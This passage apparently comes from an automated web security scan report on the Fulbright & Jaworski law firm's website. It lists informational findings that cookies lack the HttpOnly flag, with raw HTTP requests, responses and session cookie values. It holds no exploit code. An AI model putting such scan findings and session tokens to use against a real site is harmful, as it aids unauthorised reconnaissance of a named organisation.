User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

10.63. http://www.fulbright.com/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /downloads HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.64. http://www.fulbright.com/dubai  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /dubai

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dubai HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.65. http://www.fulbright.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

10.66. http://www.fulbright.com/houston  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /houston

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /houston HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2094%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.67. http://www.fulbright.com/industries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /industries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /industries HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.68. http://www.fulbright.com/insite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.69. http://www.fulbright.com/international  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /international

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /international HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.70. http://www.fulbright.com/jblount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /jblount

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jblount HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                        <html>
<head>
<title>


                   
...[SNIP]...

10.71. http://www.fulbright.com/languages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /languages

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /languages HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A50%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1351%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:51:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.72. http://www.fulbright.com/news/act_ticker_xml.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /news/act_ticker_xml.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/act_ticker_xml.cfm HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/
Content-Type: text/xml


<images>

       <item>
           <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news>
           <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&amp;article_id=9405&amp;site_id=286<
...[SNIP]...

10.73. http://www.fulbright.com/newsTicker.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /newsTicker.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newsTicker.swf HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/dc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

10.74. http://www.fulbright.com/newyork  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /newyork

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newyork HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:55:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2404%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:29 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.75. http://www.fulbright.com/offices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /offices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:51:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.76. http://www.fulbright.com/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.77. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /seminars/act_eventbanner_xml.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seminars/act_eventbanner_xml.cfm HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/
Content-Type: text/xml


<?xml version="1.0" encoding="iso-8859-1"?>
   <events>
   
           
       <event>
           <picture>http://www.fulbright.com/img/banners/seminar/20100119LaborandEmploymentLawUpdate.jpg</picture>
           <url>http://
...[SNIP]...

10.78. http://www.fulbright.com/technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /technology

Issue detail

